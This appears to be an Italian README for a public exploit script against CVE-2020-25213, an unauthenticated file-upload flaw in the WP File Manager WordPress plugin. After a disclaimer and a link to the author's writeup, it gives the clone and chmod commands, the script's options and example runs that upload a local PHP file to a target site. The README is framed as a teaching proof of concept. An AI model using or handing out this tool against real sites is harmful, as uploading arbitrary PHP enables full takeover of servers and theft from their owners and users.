
https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8
Il plugin WordPress WP-file-manager (<6.9) è vulnerabile al caricamento arbitrario di file senza autenticazione, con conseguente compromissione totale del sistema.
Per maggiori dettagli fai riferimento al mio writeup pubblicato qui
Non ho scoperto questa vulnerabilità e non mi assumo alcun merito per questa CVE. Ho creato l'exploit solo dopo aver analizzato la descrizione disponibile su vari blog come wordfence, seravo, con l'intento di far capire ai lettori come creare un POC semplicemente analizzando la descrizione della vulnerabilità.
Non sono responsabile per eventuali danni causati a un'organizzazione che utilizzi questo exploit e consiglio ai lettori di non sfruttare questa vulnerabilità senza il consenso scritto dell'organizzazione, poiché potrebbe esporre l'organizzazione ad attacchi da parte di altri hacker.
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh-u|--wp_url Wordpress target url
-f|--upload_file Absolute location of local file to upload on the target.
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
